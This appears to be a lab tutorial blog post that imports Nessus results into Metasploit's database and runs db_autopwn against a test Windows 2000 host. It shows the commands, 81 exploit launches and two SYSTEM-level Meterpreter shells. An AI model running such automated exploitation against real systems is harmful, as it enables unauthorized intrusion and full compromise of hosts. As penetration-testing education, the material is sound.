In the previous post I showed how integrating Nessus with MSF can make our lives quite interesting.
Now I will refine the tests, using MySQL to keep the targets and their vulnerabilities in a database and exploiting them automatically with db_autopwn.
The test environment remains the same:
Debian host with Nessus, Metasploit and MySQL
Windows 2000 host
Prerequisites for the tests:
Have the following items installed:
* libdbd-mysql-ruby1.8
* The activerecord module ( gem install activerecord )
Preparing the environment
I started the MySQL driver in MSF
msf> db_driver mysql
I connected to the database server and created a database called msf
msf> db_connect msf:******@localhost/msf
I imported the Nessus report into the database
msf> nessus_report_get af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0
Listing the ports from the msf database
msf> db_services
Services
========

created_at info name port proto state updated_at Host Workspace
---------- ---- ---- ---- ----- ----- ---------- ---- ---------
Fri Oct 01 12:06:03 UTC 2010 ftp 21 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 epmap 135 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 135 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 netbios-ns 137 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 smb 139 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 cifs 445 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1025 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1028 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5800 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5801 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5900 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5901 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Listing the vulnerabilities from the msf database
msf > db_vulns
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=21 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5801 proto=tcp name=NSS-24260 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10758 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10107 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-43111 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=1028 proto=udp name=NSS-10736 refs=
….
db_autopwn
db_autopwn scans the database and builds a list of modules matching each vulnerability recorded for the target. The modules are selected in two ways:
1 – Exploits are loaded by analysing the vulnerability list. This kind of cross-referencing depends on standards such as OSVDB, Bugtraq and CVE to link an exploit to the target.
2 – The default ports associated with each exploit are used to find targets running the same service.
msf > db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
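As an added example that is not from the original post or the Metasploit project, the Ruby script below models the two selection strategies described above (reference cross-referencing, -x, and default-port matching, -p) and the -I / -X host range filters, working over records parsed from the db_services and db_vulns output shown earlier. The db_services lines are copied from the post; the db_vulns sample mirrors the post's rows (refs= empty) plus one constructed row carrying placeholder references; the module list reuses the module names from the autopwn run above with the ports autopwn matched them on, but its :refs values are placeholders, not the modules' real references. It models the selection step only and launches nothing.

```ruby
require 'ipaddr'

# Constructed sample of `db_services` output, copied in shape from the
# post (one line deliberately has no service name, as in the original).
SERVICES_OUTPUT = <<~TXT
  Fri Oct 01 12:06:03 UTC 2010 ftp 21 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
  Fri Oct 01 12:06:03 UTC 2010 epmap 135 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
  Fri Oct 01 12:06:03 UTC 2010 135 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
  Fri Oct 01 12:06:03 UTC 2010 cifs 445 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
  Fri Oct 01 12:06:03 UTC 2010 www 5800 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
TXT

# Constructed sample of `db_vulns` output. The first two rows mirror the
# post (refs= empty); the third is invented, with placeholder references,
# so that the reference-based path has something to match.
VULNS_OUTPUT = <<~TXT
  [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-19288 refs=
  [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=21 proto=tcp name=NSS-22964 refs=
  [*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=445 proto=tcp name=NSS-EXAMPLE refs=REF-PLACEHOLDER-1,REF-PLACEHOLDER-2
TXT

# Module names are the ones the post's autopwn run listed; the ports are the
# ones autopwn matched them on. The :refs values are placeholders, not the
# modules' real references.
MODULES = [
  { name: 'exploit/windows/vnc/winvnc_http_get', ports: [5800], proto: 'tcp', refs: [] },
  { name: 'exploit/windows/smb/ms06_066_nwapi', ports: [445], proto: 'tcp', refs: ['REF-PLACEHOLDER-1'] },
  { name: 'exploit/windows/ftp/servu_mdtm', ports: [21], proto: 'tcp', refs: [] },
  { name: 'exploit/windows/dcerpc/ms03_026_dcom', ports: [135], proto: 'tcp', refs: [] }
].freeze

# One db_services row: created_at is six tokens, then an optional service
# name, port, proto, state, updated_at (six tokens), host, workspace.
def parse_service(line)
  t = line.split
  i = t.index { |x| x == 'tcp' || x == 'udp' }
  return nil if i.nil? || i < 7
  { name: i == 8 ? t[6] : nil, port: t[i - 1].to_i, proto: t[i],
    state: t[i + 1], host: t[-2], workspace: t[-1] }
end

# One db_vulns row: key=value pairs after "Vuln:"; refs is comma separated.
def parse_vuln(line)
  kv = line.scan(/(\w+)=(\S*)/).to_h
  return nil unless kv['host'] && kv['port']
  { host: kv['host'], port: kv['port'].to_i, proto: kv['proto'],
    name: kv['name'], refs: kv.fetch('refs', '').split(',').reject(&:empty?) }
end

def parse_all(text)
  text.lines.map { |l| yield(l.strip) }.compact
end

# -p: a module is a candidate for every open service on one of its ports.
def match_by_port(services, modules)
  services.select { |s| s[:state] == 'open' }.flat_map do |s|
    modules.select { |m| m[:proto] == s[:proto] && m[:ports].include?(s[:port]) }
           .map { |m| { host: s[:host], port: s[:port], mod: m[:name], how: 'port match' } }
  end
end

# -x: a module is a candidate when it shares a reference with a recorded vuln.
def match_by_refs(vulns, modules)
  vulns.flat_map do |v|
    modules.select { |m| (m[:refs] & v[:refs]).any? }
           .map { |m| { host: v[:host], port: v[:port], mod: m[:name], how: 'ref match' } }
  end
end

# -I / -X: keep only hosts inside `only`, drop hosts inside `exclude`.
def filter_hosts(matches, only: nil, exclude: nil)
  matches.select do |m|
    ip = IPAddr.new(m[:host])
    (only.nil? || IPAddr.new(only).include?(ip)) &&
      (exclude.nil? || !IPAddr.new(exclude).include?(ip))
  end
end

if __FILE__ == $PROGRAM_NAME
  services = parse_all(SERVICES_OUTPUT) { |l| parse_service(l) }
  vulns    = parse_all(VULNS_OUTPUT)    { |l| parse_vuln(l) }
  all = match_by_port(services, MODULES) + match_by_refs(vulns, MODULES)
  filter_hosts(all, only: '192.168.0.0/24').each do |m|
    puts "#{m[:host]}:#{m[:port]} #{m[:mod]} (#{m[:how]})"
  end
end
```

With the post's own rows the reference path yields nothing, which is exactly what the run below reports in its "Analysis completed in 7 seconds (0 vulns / 0 refs)" line: the imported findings carried no references, so every candidate it lists is a "(port match)", and port matching fires every module that shares a default port with an open service, hence 81 launches against a single host. Reference matching is the more selective path, but it only works when the import carries OSVDB, Bugtraq or CVE identifiers.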
Time for action 😛
msf > db_autopwn -p -t -e
[*] Analysis completed in 7 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.0.6:5800 exploit/windows/vnc/winvnc_http_get (port match)
[*] 192.168.0.6:445 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/filecopa_list_overflow (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/servu_mdtm (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/easyfilesharing_pass (port match)
[*] 192.168.0.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
[*] 192.168.0.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.0.6:445 exploit/linux/samba/trans2open (port match)
….
================================================================================
[*] (1/81 [0 sessions]): Launching exploit/windows/vnc/winvnc_http_get against 192.168.0.6:5800…
[*] (2/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.0.6:445…
[*] (3/81 [0 sessions]): Launching exploit/windows/ftp/filecopa_list_overflow against 192.168.0.6:21…
[*] (4/81 [0 sessions]): Launching exploit/windows/ftp/servu_mdtm against 192.168.0.6:21…
[*] (5/81 [0 sessions]): Launching exploit/windows/ftp/easyfilesharing_pass against 192.168.0.6:21…
[*] (6/81 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.6:445…
[*] (7/81 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.0.6:445…
[*] (8/81 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.0.6:445…
[*] (9/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.0.6:139…
….
[*] (81/81 [0 sessions]): Waiting on 35 launched modules to finish execution…
[*] Meterpreter session 1 opened (192.168.0.3:46168 -> 192.168.0.6:15979) at Fri Oct 01 10:37:39 -0300 2010
[*] Meterpreter session 2 opened (192.168.0.3:43223 -> 192.168.0.6:24353) at Fri Oct 01 10:37:40 -0300 2010
[*] (81/81 [2 sessions]): Waiting on 22 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 12 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
….
[*] The autopwn command has completed with 2 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id Type Information Connection Via
-- ---- ----------- ---------- ---
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:46168 -> 192.168.0.6:15979 exploit/windows/dcerpc/ms03_026_dcom
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:43223 -> 192.168.0.6:24353 exploit/windows/dcerpc/ms03_026_dcom
[*] ================================================================================
Starting the session
msf > sessions -i 1
[*] Starting interaction with 1…
meterpreter > execute -i -H -f cmd.exe
Process 736 created.
Channel 1 created.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
Important remarks:
0 – This is not magic, it is technology;
1 – These tests are purely experimental;
2 – Using these tools and carrying out these actions requires some prior knowledge, such as:
* Understanding operating systems;
* A deep understanding of the TCP/IP protocol;
* Understanding how exploits, payloads, shellcodes, etc. work;
* Understanding the dynamics of the causes and impacts of vulnerabilities;
* Using this knowledge ethically;
Veeery interesting, haha